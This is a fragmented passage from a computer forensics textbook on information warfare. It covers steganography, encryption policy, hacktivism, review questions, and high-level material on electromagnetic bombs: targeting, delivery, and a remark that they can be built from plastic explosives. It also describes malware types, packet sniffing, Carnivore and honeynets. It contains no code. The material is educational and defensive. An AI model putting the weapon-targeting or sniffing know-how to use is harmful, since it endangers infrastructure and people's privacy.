case, a proxy server at the firewall of a secure site) to create an onion, which consists of public-key-encrypted layers of instructions
...
The onion then
goes to Routers Y and Z, depositing keys at each stop
...
To respond, the recipient sends the message to
Router Z, which encrypts the text, onion-style, and sends it back through the already established path
...
The microdot consisted of a greatly reduced photograph of a page of text, which was
pasted over a period in an otherwise innocuous document
...
Unlike encryption, which hides the content of a message in
an obvious manner, steganography hides the mere existence of anything hidden
...
The resulting file sounds
the same to the human ear and is the same length as the original file
...
Typical images use 256 levels of brightness, with 8 bits per pixel for black-and-white
images and 8 bits for each of the three primary colors (red, green, and blue) per
pixel for color images
...

Hiding data in the areas of a computer floppy disk or hard drive that are normally
not accessed
...
When a file is saved, it uses a portion of one or more
clusters; because DOS and Windows store only one file per cluster, the space left
over between the end of a file and the end of the cluster (called the slack) is available to hide data in
...


The Information Warfare Arsenal and Tactics of Private Companies

499

The Future of Encryption
Encryption today is as strong as it is because there is no need for it to be any
stronger
...
Meanwhile, an encryption method can be strengthened by
merely adding bits to the encryption key
...

Few microprocessors have been specially designed to run encryption software
...
For these devices, a new class of algorithms, known as elliptic curve encryption, is claimed to
provide encryption strength equal to that of the standard algorithms in use today,
while using a smaller key and arithmetic that is easier on microprocessors and that
needs much less memory
...

Voice encryption is a response to the increasing flow of audio traffic over the
World Wide Web, which has led, among other things, to the merging of strong encryption with Internet telephony
...

Perhaps the most advanced such software is Speak Freely, which is available
worldwide free of charge (see http://www
...
org)
...
Instead, they route the
data through the company’s servers, thereby opening up a security weakness
...
Rather, it is a
means for creating and securing the distribution of private keys
...

The precepts of quantum cryptography date from the early 1970s, and research
has been ongoing for the past decade at universities such as Johns Hopkins University, in Baltimore, Maryland, and the University of Geneva in Switzerland; at
U
...
national laboratories such as Los Alamos; and in the corporate sector, at
British Telecom and elsewhere
...

A piece of DNA spelling out the message to be encrypted is then synthesized, and
the strand is slipped into a normal fragment of human DNA of similar length
...
As only one DNA strand
in about 30 billion will contain the message, the detection of even the existence of
the encrypted message is most unlikely
...
In what may be a sign of things to come, the German government announced in May 1999 that it would fund the development and free distribution of
open-source encryption software that the government itself will be unable to break
(see http://www
...
org)
...

Also in 1999, French Prime Minister Lionel Jospin announced a similar shift,
saying that his country would scrap any key escrow plans in favor of free use of
cryptography
...

Independently, the Canadian government announced in October 1999 that it
would not seek to regulate the domestic use of encryption
...
Society’s transformation into a computer-based economy makes protecting corporate and personal information not only desirable
but also necessary
...
A partial solution may be to criminalize the use of encryption
only in the commission of generally recognized serious crimes and to encourage its
use elsewhere
...
Similarly,
the granting of new policing powers to law enforcement agencies will do less to protect a country’s critical infrastructure than building better security technology
...


The Information Warfare Arsenal and Tactics of Private Companies

501

KEEPING THE AMATEUR ROGUE OUT OF THE CYBERHOUSE
Finally, how do you keep amateur rogues out of the cyberhouse? Today, you probably can’t, but, tomorrow (see Chapter 17, “The Information Warfare Arsenal of
the Future”)—well, that’s another matter
...
Increasingly, these amateur social activists have turned
to hacking to make their point, breaking into computer systems and wreaking havoc
on organizations they oppose
...

The term hacktivist was first applied to supporters of the Zapatista rebels in
Mexico’s southern state of Chiapas, who have sabotaged Mexican government Web
sites since 1998 and held “virtual sit-ins” designed to overload servers
...
In one case, Palestinian sympathizers broke
into a Web site operated by a pro-Israel lobbying group in the United States, stealing credit card information and email addresses
...
Antiglobalist protesters contend
the WTO’s trade treaties benefit big corporations and rich countries at the expense
of the environment and workers
...
Online, however,
they effectively surmounted physical barriers
...
The attacks against forum organizers showed just how far hacktivists could reach
...
This poses operational security
problems and goes beyond what’s been seen before
...
In some respect, it is really quite clever and quite funny
...
The more

502

Computer Forensics, Second Edition

extreme scenarios discussed in this chapter may never occur
...
It is not advisable for any risk-management
approach to disregard the threats previously discussed on the basis that they are farfetched and fanciful
...
The undetectability of many attacks may lead private companies to a
false sense of security and leave the companies vulnerable to serious disruption or
total disablement in the event of an attack
...

Conclusions
As competition for profit increases between corporations and consumer expectations grow, there may soon be a time that, for some private companies, even a
limited disablement may be fatal, or nearly fatal, to its continued existence, surely
one of the most important post-threat outcomes of any risk-management plan
...

Added to the traditional aggressors identified by private companies are the
ones that may now see the companies as a visible surrogate of an entity that is
either impregnable from attack or that it is inadvisable to attack
...

It must be appreciated that new, and very powerful, tools of aggression may
now be available to those traditional aggressors
...

The approach to determining risk and how to protect against and prevent network attacks must be revised
...

Traditional forms of risk management represent an approach positioned in a
hierarchical paradigm, which may not deal adequately or at all with new forms
of threat posed to a dynamic network
...
Nor will it be able to say that it has treated them
...


The Information Warfare Arsenal and Tactics of Private Companies

503

An Agenda for Action
Management of cyberterrorism risk must be considered an important issue for all
aspects of society, not only for private companies
...

The dangers in failing to recognize the risk could be serious
...

The U
...
government needs to set an agenda for action that goes beyond the
work already done in preparation for protecting the IW arsenal and tactics of private companies
...
1 in Appendix F),
the computer forensics specialist (CFS) should adhere to the provisional list of actions for networks
...
A number of these systems
have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? As competition for profit increases between corporations and
consumer expectations grow, there may soon be a time when, for some private
companies, even a limited disablement may be fatal, or nearly fatal, to its continued existence, surely one of the most important post-threat outcomes of any
risk-management plan
...
True or False? The decrease in the number of aggressors must be appreciated
...
True or False? Added to the traditional aggressors identified by private companies are the ones that may now see the companies as a visible surrogate of an
entity that is either impregnable from attack or that it is inadvisable to attack
...
True or False? Traditional forms of risk management are particularly suitable
to the dynamic, desegregated forms of aggression
...
True or False? The approach to determining risk and how to protect against
and prevent network attacks must be revised
...
Various aspects of society are being transferred to cyberspace, except:
A
...
Transactional activities
C
...
Infrastructure activities
2
...
Data destruction
B
...
Penetration of a system to modify its output
D
...
The collapse of the former Soviet Union into what could be termed a “transnational kleptocracy,” has led to some fundamental changes in the international
security environment, except:
A
...

B
...

C
...

D
...
These enterprises have spread beyond the borders of any particular state
...
Estimates claim that 89% of Russian banks are under criminal control
...
The three elements of IPK are, except:
A
...
Information technology
C
...
Political, ethnic, and religious groups
5
...
Internet protocol
B
...
Traditional psychological operations or deception operations
D
...
Clandestine human intelligence operations or overt research operations
Exercise
In the preliminary stages of an employment dispute case, a CFS was brought in by
a large computer services corporation to perform a forensic recovery on an employee’s desktop computer
...
How did the CFS go
about conducting the investigation?

HANDS-ON PROJECTS
After finding pornography downloaded on its network server and a number of individual office computers, a client began to build a case for employee dismissal
...
How did the CFST go
about conducting their examination?
Case Project
After being sued for negligence, a client was about to settle a multimillion dollar
suit and rewrite their entire software package because the plaintiff was charging that
the installation of the software in question had permanently damaged/erased existing files; the irreplaceable data was not recoverable by any means and the plaintiff
could not access files in a specific software application critical to running his business
...
The backup tapes (plastic-material) had been co-located
with the server drives and were themselves destroyed
...
How was the CFS able to go about recovering the data?

506

Computer Forensics, Second Edition

REFERENCES
[1] Vacca, John R
...

[2] Vacca, John R
...

[3] Vacca, John R
...

[4] Vacca, John R
...
, Charles River Media, Hingham, MA, 2001
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
, Net Privacy: A Guide to Developing and Implementing an
Ironclad ebusiness Privacy Plan, McGraw-Hill, New York, 2001
...
” To date, the defense establishment has yet to agree on the exact definition of the term information warfare
...
Warnings also come from more sober sources
...
S
...
In other
words, the one thing that everyone agrees on is that in the digital age, information,
and its dissemination, has achieved the status of a vital strategic asset
...
ABC’s Alias and Fox’s 24, don’t hold a candle to La Femme Nikita when it comes to wholesale assassinations and torture
...

Sound implausible? Maybe
...
NSA and the CIA realize that conventional information warfare (IW)
tactics will not be enough in the future to thwart the very dangerous and often suicidal covert terrorist organizations
...

In the very near future, agents trained and armed with an arsenal of futuristic
high-tech weapons and trained in the most sophisticated techniques for carrying out
successful assassinations will swoop down upon deadly terrorist operatives
...
They will also have to keep their
wits about them, as well as ingenuity to keep themselves alive, where a single mistake
could mean death
...

If the response of the American defense establishment is any indication, strategic analysts are taking the possibilities of infowar seriously
...
Special committees in every branch of
the U
...
armed forces are studying the potential of infowar, both as a defensive and
an offensive weapon
...
” Among the current possible offensive weapons are:
Computer viruses, which could be fed into an enemy’s computers either remotely or by “mercenary” technicians
Logic bombs, another type of virus that can lie dormant for years, until, upon receiving a particular signal, it would wake up and begin attacking the host system
“Chipping,” a plan (originally proposed by the CIA, according to some
sources) to slip booby-trapped computer chips into critical systems sold by
foreign contractors to potentially hostile third parties (or recalcitrant allies?)
Worms, whose purpose is to self-replicate ad infinitum, thus eating up a system’s resources
Trojan horses, malevolent code inserted into legitimate programming to perform a disguised function
Back doors and trap doors, a mechanism built into a system by the designer to
give the manufacturer or others the ability to sneak back into the system at a
later date by circumventing the need for access privileges

The Information Warfare Arsenal of the Future

509

A few other goodies in the arsenal of IW are devices for disrupting data flow or
damaging entire systems, hardware and all
...
Such
devices can destroy electronics and communications equipment over a wide area
...


WEAPONS OF THE FUTURE
Body count: 796
...
The air traffic control system was “cybotaged
...
It’s suspected that the automated route and altitude management program’s collision-avoidance algorithm was damaged
...
Cause: midair collision with a structure
...
No reports yet on how the
hackers got in
...

A message posted to 90,000 newsgroups from a group known as “The Vulture
of Jihad” claimed credit for the attack
...
Other Islamic splinter groups also claimed credit, along
with a white supremacist faction and an anarchist syndicate
...
The most outrageous theory as
to the identity of the people responsible for the attack came on a hit site called the
Hit Theorist
...

Do these scenarios sound like spin-offs from Fox’s X-Files’ “The Lone Gunmen”? Perhaps
...

The Electromagnetic Bomb: A Weapon of Electrical Mass Destruction
Perhaps the most dangerous of all of defensive and offensive weapons in the IW arsenal of the future is the electromagnetic bomb
...
The development of conventional E-bomb devices allows their use in nonnuclear confrontations
...

The efficient execution of an IW campaign against a modern industrial or
postindustrial opponent will require the use of specialized tools designed to destroy
information systems
...

The EMP Effect

The EMP effect was first observed during the early testing of high-altitude airburst
nuclear weapons
...
The
EMP is, in effect, an electromagnetic shock wave
...
The source can be a nuclear or a nonnuclear
detonation
...
It destroys the electronics
of all computer and communication systems in a quite large area
...

This pulse of energy produces a powerful electromagnetic field, particularly within
the vicinity of the weapon burst
...

It is this aspect of the EMP effect that is of military significance, as it can result in irreversible damage to a wide range of electrical and electronic equipment,
particularly computers and radio or radar receivers
...
The damage inflicted is not
unlike that experienced through exposure to close proximity lightning strikes and
may require complete replacement of the equipment, or at least substantial portions thereof
...
What is significant
about MOS devices is that very little energy is required to permanently wound or
destroy them; any voltage typically in excess of ten volts can produce an effect
termed “gate breakdown,” which effectively destroys the device
...

Wounded devices may still function, but their reliability will be seriously impaired
...

Computers used in data processing systems; communications systems; displays;
industrial control applications, including road and rail signaling; and those embedded in military equipment, such as signal processors, electronic flight controls, and
digital engine control systems, are all potentially vulnerable to the EMP effect
...
Telecommunications equipment can be highly vulnerable, because of
the presence of lengthy copper cables between devices [1]
...
Therefore, radar and electronic warfare equipment,
satellite, microwave, UHF, VHF, HF, and low-band communications equipment
and television equipment are all potentially vulnerable to the EMP effect
...

The Technology Base for Conventional Electromagnetic Bombs
The technology base that may be applied to the design of electromagnetic bombs is
both diverse and in many areas quite mature
...
A wide
range of experimental designs have been tested in these technology areas, and a
considerable volume of work has been published in unclassified literature
...
This treatment is not exhaustive and
is only intended to illustrate how the technology base can be adapted to an operationally deployable capability
...
Unlike the technology
base for weapon construction, which has been widely published in the open literature, lethality-related issues have been published much less frequently
...
This is for good
reasons
...
Equipment that has been intentionally shielded
and hardened against electromagnetic attack will withstand greater orders of magnitude and field strengths than standard commercially rated equipment
...

The second major problem area in determining lethality is that of coupling efficiency, which is a measure of how much power is transferred from the field produced by the weapon into the target
...

Targeting Electromagnetic Bombs
The task of identifying targets for attack with electromagnetic bombs can be complex
...
Buildings housing government offices and thus computer equipment, production facilities, military
bases, and known radar sites and communications nodes are all targets that can be
readily identified through conventional photographic, satellite, imaging radar, electronic reconnaissance, and human operations
...
With the accuracy inherent in global positioning system
(GPS)/inertially guided weapons, the electromagnetic bomb can be programmed to
detonate at the optimal position to inflict a maximum of electrical damage
...
Mobile and relocatable air defense equipment, mobile communications
nodes [2], and naval vessels are all good examples of this category of target
...
In the latter instance, target coordinates
can be continuously datalinked to the launch platform
...


The Information Warfare Arsenal of the Future

513

Mobile or hidden targets that do not overtly radiate may present a problem,
particularly should conventional means of targeting be employed
...
This solution
is the detection and tracking of unintentional emission (UE)
...
Termed “Van Eck
radiation,” such emissions can only be suppressed by rigorous shielding and
emission-control techniques, such as are employed in TEMPEST rated equipment
...

To target such an emitter for attack requires only the ability to identify the type of
emission and thus target type and to isolate its position with sufficient accuracy to
deliver the bomb
...

A good precedent for this targeting paradigm exists
...
S
...
Once a truck was identified and tracked, the gunship would engage it
...
The use of stealthy reconnaissance aircraft or long-range, stealthy unmanned aerial vehicles (UAVs) may
be required
...
These
would be programmed to loiter in a target area until a suitable emitter is detected,
upon which the UAV would home in and expend itself against the target
...
Like explosive warheads, electromagnetic warheads
may be fitted to a range of delivery vehicles
...
The choice of a cruise missile airframe will restrict the

514

Computer Forensics, Second Edition

weight of the weapon to about 340 kg (750 lb), although some sacrifice in airframe
fuel capacity could see this size increased
...

Therefore, the available payload capacity will be split between the electrical storage and the weapon itself
...
Air-delivered bombs, which have a flight time between tens of seconds
to minutes, could be built to exploit the launch aircraft’s power systems
...

An electromagnetic bomb delivered by a conventional aircraft can offer a much
better ratio of electromagnetic device mass to total bomb mass, as most of the
bomb mass can be dedicated to the electromagnetic-device installation itself
...

A missile-borne electromagnetic warhead installation will be composed of the
electromagnetic device, an electrical energy converter, and an onboard storage device such as a battery
...
The electromagnetic device will be detonated by the missile’s onboard fusing system
...
The warhead fraction (ratio of total payload [warhead] mass to launch mass of the weapon)
will be between 15% and 30%
...

Fusing could be provided by a radar altimeter fuse to airburst the bomb, a barometric fuse, or in GPS/inertially guided bombs, the navigation system
...

Because of the potentially large lethal radius of an electromagnetic device compared to an explosive device of similar mass, standoff delivery would be prudent
...

The recent advent of GPS satellite [3] navigation guidance kits for conventional bombs and glidebombs has provided the optimal means for cheaply delivering such weapons
...

The U
...
Air Force has deployed the Northrop GPS-aided munition (GAM) on
the B-2 bomber as well as the GPS/inertially guided GBU-29/30 joint direct attack
munition (JDAM) and the AGM-154 joint stand-off weapon (JSOW) glidebomb
...
For example, the Australian
BAeA agile glide weapon (AGW) glidebomb is achieving a glide range of about 140
km (75 nautical miles [nmi]) when launched from that altitude
...

First, the glidebomb can be released from outside the effective radius of target air defenses, therefore minimizing the risk to the launch aircraft
...
Finally
the bomb’s autopilot may be programmed to shape the terminal trajectory of the
weapon, such that a target may be engaged from the most suitable altitude and aspect
...
As you can expect GPS-guided munitions to become the
standard weapon in use by Western air forces in the 21st century, every aircraft capable of delivering a standard guided munition also becomes a potential delivery
vehicle for an electromagnetic bomb
...

Because of the simplicity of electromagnetic bombs in comparison with
weapons such as anti-radiation missiles (ARMs), it is not unreasonable to expect
that these should be both cheaper to manufacture and easier to support in the field,
thus allowing for more substantial weapon stocks
...

Defense Against Electromagnetic Bombs
The most effective defense against electromagnetic bombs is to prevent their delivery by destroying the launch platform or delivery vehicle, as is the case with nuclear
weapons
...


516

Computer Forensics, Second Edition

The most effective method is to wholly contain the equipment in an electrically
conductive enclosure, termed a “Faraday cage,” which prevents the electromagnetic
field from gaining access to the protected equipment
...
Although optical fibers address this requirement for transferring
data in and out, electrical power feeds remain an ongoing vulnerability
...
A range of devices exist, but care must be
taken in determining their parameters to ensure that they can deal with the rise
time and strength of electrical transients produced by electromagnetic devices
...

Hardening of systems must be carried out at a system level, as electromagnetic
damage to any single element of a complex system could inhibit the function of the
whole system
...
Older equipment and systems may be impossible to harden properly or may require complete replacement
...

An interesting aspect of electrical damage to targets is the possibility of wounding semiconductor devices, thereby causing equipment to suffer repetitive intermittent faults rather than complete failures
...
Intermittent faults may not be economically possible to repair, thereby causing equipment in this state to be removed from
service permanently, with considerable loss in maintenance hours during damage
diagnosis
...
Indeed, shielding that is
incomplete may resonate when excited by radiation and thus contribute to damage
inflicted on the equipment contained within it
...
Where radio frequency communications
must be used, low probability of intercept (spread spectrum) techniques should be
employed exclusively to preclude the use of site emissions for electromagnetictargeting purposes
...

Communications networks for voice, data, and services should employ topologies with sufficient redundancy and failover mechanisms to allow operation with
multiple nodes and links inoperative
...

Limitations of Electromagnetic Bombs
The limitations of electromagnetic weapons are determined by weapon implementation and means of delivery
...

Means of delivery will constrain the accuracy with which the weapon can be positioned in relation to the intended target
...

In the context of targeting military equipment, it must be noted that
thermionic technology (vacuum tube equipment) is substantially more resilient to
the electromagnetic weapons effects than solid-state (transistor) technology
...
Therefore, a hard electrical kill may not be achieved
against such targets unless a suitable weapon is used
...
Radiating targets such as radars or communications
equipment may continue to radiate after an attack even though their receivers and
data processing systems have been damaged or destroyed
...
Conversely, an opponent
may shut down an emitter if attack is imminent, and the absence of emissions means
that the success or failure of the attack may not be immediately apparent
...
A good case can be made for developing tools specifically for the
purpose of analyzing unintended emissions, not only for targeting purposes but
also for kill assessment
...
Although the relationship between electromagnetic field strength and distance from the weapon is one of an inverse square
law in free space, the decay in lethal effect with increasing distance within the atmosphere will be greater because of quantum physical absorption effects
...
These will therefore
contain the effect of HPM weapons to shorter radii than are ideally achievable in
the K and L frequency bands
...
Should the delivery error be of the order of the weapon’s lethal radius for a given detonation
altitude, lethality will be significantly diminished
...

Therefore, accuracy of delivery and achievable lethal radius must be considered
against the allowable collateral damage for the chosen target
...
An inaccurately delivered weapon of large lethal radius may be unusable
against a target should the likely collateral electrical damage be beyond acceptable
limits
...

The Proliferation of Electromagnetic Bombs
At the time of this writing, the United States is one of several nations with the established technology base and the depth of specific experience to design weapons
based upon this technology
...

As an example, the fabrication of an effective FCG can be accomplished with
basic electrical materials, common plastic explosives such as C-4 or Semtex, and readily available machine tools such as lathes and suitable mandrels for forming coils
...

This cost could be even lower in a third world or newly industrialized economy
...
The dependence of modern economies upon
first world nations’ information technology infrastructures, makes them highly
vulnerable to attack with such weapons, providing that such weapons can be delivered to their targets
...
If the copper media were to be replaced en masse with optical fiber to
achieve higher bandwidths, the communications infrastructure would become
significantly more robust against electromagnetic attack
...
Moreover, the gradual replacement of coaxial

The Information Warfare Arsenal of the Future

519

Ethernet networking with 10-Base-T twisted pair equipment has further increased
the vulnerability of wiring systems inside buildings
...

At this time, no counter-proliferation regimes exist
...

With the former Soviet Union suffering significant economic difficulties, the
possibility of microwave and pulse power technology designs leaking out to third
world nations or terrorist organizations should not be discounted
...

A Doctrine for the Use of Conventional Electromagnetic Bombs
A fundamental tenet of IW is that complex organizational systems such as governments, industries, and military forces cannot function without the flow of information through their structures
...
A trivial model for this function would see commands and directives flowing outward from a central decisionmaking element, with information about the state of the system flowing in the
opposite direction
...

This is of military significance because stopping this flow of information will
severely debilitate the function of any such system
...
Stopping the inward flow of information isolates the decisionmaking element from reality and thus severely inhibits its capacity to make rational
decisions that are sensitive to the currency of information at hand
...
The Desert Storm air war of 1991 is a good example, with a
substantial effort expended against such targets
...
No less important, modern electronic
combat concentrates on the disruption and destruction of communications and
information-gathering sensors used to support military operations
...

A strategy that stresses attack on the information-processing and communications elements of the targeted systems offers a very high payoff, as it will introduce
an increasing level of paralysis and disorientation within its target
...


520

Computer Forensics, Second Edition

Computer Viruses
A virus is a code fragment that copies itself into a larger program, modifying that
program
...
The virus then
replicates itself, infecting other programs as it reproduces
...
One could imagine that the
CIA (or Army, Air Force, etc
...
As today’s telephone systems are switched by
computers, you can shut them down, or at least cause massive failure, with a virus
as easily as you can shut down a computer
...
It reproduces by copying itself in full-blown
fashion from one computer to another, usually over a network
...

If worms don’t destroy data, they can cause the loss of communication by
merely eating up resources and spreading through networks
...
With a “wildlife” like this, you
could imagine breaking down a networked environment such as an ATM and
banking network
...
It’s a popular mechanism for disguising a virus or a worm
...
If someone edits
this program so that it sends discovered security holes in an email message back to
him (password file could also be included), the cracker acquired much information
about vulnerable hosts and servers
...

Logic Bombs
A logic bomb is a type of trojan horse used to release a virus, a worm, or some other
system attack
...

With the overwhelming existence of U
...
-based software (MS Windows or
UNIX systems), the U
...
government, or whomever you would like to imagine,
could decide that no software would be allowed to be exported from that country

The Information Warfare Arsenal of the Future

521

without a trojan horse
...
Its activation could also
be triggered from the outside
...

Trap Doors

A trap door, or a back door, is a mechanism that’s built into a system by its designer
...

As previously mentioned, all U
...
software could be equipped with a trap door
that would allow IW agencies to explore systems and the stored data on foreign
countries
...

Chipping

Just as software can contain unexpected functions, it is also possible to implement
similar functions in hardware
...
They could be built so that they fail after a certain time, blow up
after they receive a signal on a specific frequency, or send radio signals that allow
identification of their exact location— the number of possible scenarios exceeds, by
far, the scope of this chapter
...
The easiest solution is to build the additional features
into all the chips manufactured in the country that is interested in this type of IW
...
Unlike viruses, you can use these to attack not the software but the hardware of a computer system
...

They crawl through the halls and offices until they find a computer
...

Another way to damage the hardware is a special breed of microbes
...
Nano technology and microbes will be discussed in much greater
detail later in the chapter
...
The next step is not to block their traffic, but, instead, overwhelm them
with incorrect information—otherwise known as disinformation
...
The good news is, you’ll always
know exactly where you are
...

Most humans who have ever lived have known roughly where they were, dayby-day, year-by-year
...
For eons, we’ve known things
about ourselves that could be expressed in a statement like “I’m standing on the
threshing floor in the village of my birth” or “I’m walking across the mid-morning
shadow cast by Notre Dame” or even “I’m in a part of town I’ve never seen before
...
On one level, this is like the difference between knowing you’re
coming to the corner where you always turn left on your way to the grocery store
and knowing the names of the streets that cross at that intersection
...
The agent of change will be GPS—the global positioning
system—which, like so many tools of the modern world, is both familiar and misunderstood at the same time
...

Even a venerable tool of navigation such as a sextant knows nothing more about its
location than does the Mona Lisa or the pigments from which she is painted
...
This sounds as
strange and surprising as the Marauder’s Map in the Harry Potter novels [5]
...
A Marauder’s Map of the world would be even
stranger
...
This would be an ever-changing map or a world filled

The Information Warfare Arsenal of the Future

523

with artifacts busily announcing something significant about themselves to each
other and to anyone else who cared to listen
...
In August 2000, a company called SiRF Technology based
in Santa Clara, California, announced that it had developed an advanced GPS chip
no bigger than a postage stamp
...
This is a subtle but profound change in the history of
GPS technology—a change driven, like everything else these days, by increasing
miniaturization and declining prices for sophisticated circuitry
...
What SiRF and other companies have in mind, is conferring upon objects a communicable sense of place
...

Some of these objects, especially the big ones, are easy enough to imagine, because they exist now
...
So
do the newest farm implements, such as combines that allow farmers to map crop
yields in precise detail
...
For instance, the Federal Communications Commission requires cellular-phone service providers to be able to identify the location
of a cell-phone caller who dials 911
...
So do beepers and watches and handheld digital assistants and
other digital devices like Game Boy Colors, Tamagotchis (virtual game animals),
dog collars, and, probably, handguns as well
...
There’s always a limit to
how far one can see into the future of the tools being used, especially into a future
where those tools become interlinked
...

Now there’s the Internet and the World Wide Web, whose far-reaching implications are only dimly visible, but which have already transformed the way countries
all over the world do business
...
It’s already
obvious how useful GPS is in discrete applications: for surveying and mapmaking,
the tracking of commercial vehicles, maritime and aeronautic navigation, and for
use by emergency rescue crews and archaeologists
...
Awareness may be a metaphor when applied
to inanimate objects, but the potential of that metaphor is entirely literal
...
They were put there by the DoD, which began the
NAVSTAR global positioning system program in 1973
...
It could take an hour and a half for a Transit satellite to saunter above
the horizon and then another 10 or 15 minutes to fix the submarine’s position
...
The U
...
Air Force tracks the satellites from Colorado Springs, Colorado, Hawaii, and three other islands: Ascension
in the South Atlantic, Diego Garcia in the Indian Ocean, and Kwajalein in the South
Pacific
...
Ordinary
users can track this constellation of satellites with one of several Web sites or with
an appealing public-domain software program called Home Planet, which can map
any satellite you choose, GPS or not, against a projection of the Earth’s surface
...

In the world of GPS, knowing where you are, give or take a few meters, depends
on knowing precisely when you are
...
The problem with finding longitude in Harrison’s era was
making a chronometer that could keep accurate time at one location (Greenwich,
England) even while the ship carrying that chronometer was halfway around the
globe
...

GPS satellites effortlessly provide a constant frame of reference
...
The satellite clocks are
accurate to within one-millionth of a second of UTC as kept by the U
...
Naval Observatory
...
As far as most civilian users are concerned, GPS is more accurate for time
than it is for position, and, in most cases, GPS is far more accurate for position than
it is for altitude
...
Now, GPS time is available globally to anyone with a receiver
...
The U
...
military and other authorized users also receive two encrypted signals—one from L1, another from a frequency called L2
...
By measuring the time it takes a signal to reach it, a GPS receiver
calculates what is called the pseudo-range to the transmitting satellite
...
It can also calculate velocity by comparing location readings
taken at different points in time
...

When you begin to move, a GPS springs to life
...
A navigator’s task has always been to plot his current position, compare it with his previous day’s position, and deduce from those two points some idea
of tomorrow’s position
...
It’s no wonder GPS has rapidly
made its way into the navigation stations of recreational boats and commercial ships
alike, replacing older electronic navigation systems as well as celestial navigation
...
The system is purposely compromised,
its accuracy intentionally degraded
...
S
...
One way
to do that is to de-enhance everyone else’s effectiveness—to deny nonmilitary users
and foreign adversaries the kind of accuracy that military users enjoy, which in all
kinds of targeting weapons is a difference of dozens of feet
...
One of
the many ironies of GPS, however, is that a system designed mainly for military use
and developed through the DoD at a cost of more than $10 billion has been engulfed by the commercial market
...

The more positional signals a GPS receives, the more accurate it is
...
Even at present, there are ways

526

Computer Forensics, Second Edition

around selective availability
...
The most common solution is differential GPS, or DGPS, in which “differential corrections” (indications
of the degree of error at one station) are transmitted to GPS receivers via a radio
link, greatly enhancing their accuracy regardless of selective availability
...

The U
...
Coast Guard operates a maritime DGPS service available to civilians,
and the Federal Aeronautics Administration is implementing a similar system,
called the Wide Area Augmentation System, which uses satellites as well as ground
stations
...
The result of
this is a bizarre irony, in which some branches of the federal government are working hard to offset error purposely created by another federal agency, the DoD
...

Most of us think of the Earth as an inherently stable platform: bedrock
...
Tectonic plates grind at each other’s
edges, cresting upward
...
It adjusts locally to the shock of earthquakes and volcanoes
...
Torques from the atmosphere, ocean, and fluid
core move the rotation axis relative to the crust of Earth
...
GPS offers an extraordinary leap in the rate of data
collection, with a corresponding leap in the understanding of Earth’s motion
...
GPS offers one version of freedom—knowing where
you are—but it may ultimately threaten a more basic kind of freedom—being
where you are without anyone else knowing it
...
The value of cell- phones embedded with GPS chips is obvious when it
comes to emergency services, but the cell-phone service providers’ ability to track
the location of a 911 call means that GPS could track the location of every other
kind of call as well
...
This is both a form of insight to the vehicle
owners and a form of intrusion to the drivers, who find their movements visible to
management in a way they never were before
...
There is only a difference
of emphasis between tracking a parolee with a GPS and tracking a sales representa-

The Information Warfare Arsenal of the Future

527

tive with the same tool
...

Location, movement, and time are not innocuous forms of information
...
All of us inhabit a world of the senses, a world infinitely full of sensory clues
to our location and bearing
...
The very factors
that influence Earth’s rotation (the sun, moon, planets, atmosphere, oceans) influence our sense of orientation, if only we can remember how to know them
...
GPS may mean many
wonderful things, but it may also mean yet another death for the powers of human
observation
...

Now that the nonaqueous and nonarctic globe is mostly paved, and the population
of people is as thick on the Earth as mold on month-old bread, a device has been invented at last that tells you where you are without having to ask strangers
...
The meaning of “snuff” tools is obvious
...

Snoop and Sniff Tools
Sniffit is a kind of a network packet sniffer and snooper
...
Under many networking protocols, data that you transmit gets split into small segments, or packets,
and the Internet protocol (IP) address of the destination computer is written into the
header of each packet
...

As each packet travels around that destination segment, the network card on
each computer on the segment examines the address in the header
...

Promiscuous Network Cards

Packet sniffers work slightly differently
...
This lets the packet sniffers see

528

Computer Forensics, Second Edition

all data traffic on the network segment to which they’re attached—if they’re fast
enough to be able to process all that mass of data, that is
...

This data is also useful for other purposes
...
That last application is a real case of
turning the tables on the attackers: hackers use packet sniffers to check for confidential data; companies use packet sniffers to check for hacker activity
...

The thing that worries most people about Sniffit is how easy it is to install
...
It even has a graphical user interface (not exactly pretty,
but it is free)
...

It is recommended that you install a packet sniffer and have a look at what sort
of data you can see on your local network
...
They probably know of better, more professional sniffers and will be able to talk you through some of the data that you see going past
...

Sniff
Security experts are still not convinced that Carnivore (the software created by the
FBI to tap into Internet communications) is either ready to be used safely (without
abuse) or can gather information that would be legally admissible in court
...
Carnivore’s source code should be made available for open review
...
Unless it is demonstrated that Carnivore will enable
surveillance personnel to obtain the information they are authorized to see, and not
draw innocent bystanders into its net, it will remain an object of public suspicion
...
Congress and privacy advocates then called
for full disclosure of the software
...
Illinois Institute of Technology’s Research
Institute (IITRI) was chosen after accepting the review limits proposed by the FBI,
a stipulation other institutions such as the San Diego (California) Supercomputing
Center would not accept
...
Although it looks
at how Carnivore worked when it was used as intended, the report failed to look at
the larger issue: its system requirements
...
Thus, the vulnerability of the system to hackers is still not
clearly established
...
At that level, the operator (meant
to be an FBI agent) has a great deal of freedom
...
What is more,
anyone logged in as administrator can hide any evidence of the activity
...

Failure to examine the interaction between Carnivore and an ISP’s systems
may be a gap in the report
...
The scope of IITRI’s review was dictated by the FBI, and any additional effort would have invalidated the contract under which the work was performed
...
Clearly, this can
cause confidential internal communications to be compromised
...


THE PRIVACY FOUNDATION
The Privacy Foundation at the University of Denver conducts research into communications technologies and provides the public with tools to maintain privacy in
the Information Age
...
The report cites the following possible uses for this security breach:
The wiretaps can provide the ability to monitor the path of a confidential email
message and the written comments attached
...

A bugged email message can capture thousands of email addresses as the forwarded message is sent around the world
...


This security problem is a particularly dangerous one for organizations that
conduct conversations containing sensitive internal information via email
...
If there’s an email wiretap on the original external document,
each time someone forwards the message to someone else, a copy of their message
is automatically and invisibly emailed to the original sender of the external message
(or someone designated by him)
...
Eudora and AOL are not affected, nor are Web mail services such
as Yahoo and Hotmail
...
The Pentagon envisions a war in the heavens, but can it defend the ultimate high ground? You bet! Witness the experimental idea of setting up a
decoy network separate from your real one to fool intruders as they try to fool you
...
Rather, the decoy net is an entire fake network, complete with host computers on a LAN with simulated traffic,
to convince hackers for as long as possible that it’s real
...
” A group calling itself the Honeynet Project has quietly begun testing decoy
networks on the Internet
...
Other decoy networks slow intruders with an eye toward
collecting evidence to prosecute them
...
The idea is to feed back information about what
hackers do to a kind of “deception central” for network administrators
...

It is possible to create a deception network that has the same IP network address as your real network
...

There is a risk that administrators will lose track of what’s real and what’s not
...
It’s not clear yet if you can fool a lot
